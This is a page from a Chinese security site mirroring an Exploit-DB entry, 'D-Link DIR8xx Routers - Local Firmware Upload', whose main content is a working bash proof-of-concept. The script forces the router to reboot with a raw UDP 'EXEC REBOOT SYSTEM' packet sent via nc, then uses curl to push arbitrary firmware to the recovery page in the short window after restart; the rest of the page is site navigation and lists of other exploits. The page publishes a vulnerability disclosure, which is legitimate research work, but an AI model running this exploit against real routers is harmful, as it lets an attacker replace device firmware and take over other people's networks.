首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
D-Link DIR8xx Routers - Local Firmware Upload
来源:https://embedi.com 作者:embedi 发布时间:2017-09-18  
#!/bin/bash # If you have access to an ethernet port you can upload custom firmware to a device because system recovery service is started and available for a few seconds after restart. # E-DB Note: https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin # E-DB Note: https://github.com/embedi/DIR8xx_PoC/blob/b0609957692f71da48fd7de28be0516b589187c3/update.sh FIRMWARE="firmware.bin" IP="192.168.0.1" while true; do T=$(($RANDOM + ($RANDOM % 2) * 32768)) STATUS=`wget -t 1 --no-cache -T 0.2 -O - http://$IP/?_=$T 2>/dev/null` if [[ $STATUS == *"Provided by D-Link"* ]]; then echo "Uploading..." curl -F "data=@$FIRMWARE" --connect-timeout 99999 -m 99999 --output /dev/null http://$IP/f2.htm break elif [[ $STATUS == *"D-LINK"* ]]; then echo "Rebooting..." echo -n -e '\x00\x01\x00\x01EXEC REBOOT SYSTEMaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' | timeout 1s nc -u $IP 19541 fi done
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·D-Link DIR8xx Routers - Root R
·Netdecision 5.8.2 - Local Priv
·D-Link DIR8xx Routers - Leak C
·Digirez 3.4 - Cross-Site Reque
·Astaro Security Gateway 7 - Re
·Digileave 1.2 - Cross-Site Req
·Jungo DriverWizard WinDriver 1
·DigiAffiliate 1.4 - Cross-Site
·WebKit JSC BytecodeGenerator::
·Microsoft Windows Kernel - 'wi
·tcprewrite 3.4.4 Buffer Overfl
·Microsoft Windows Kernel - 'wi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved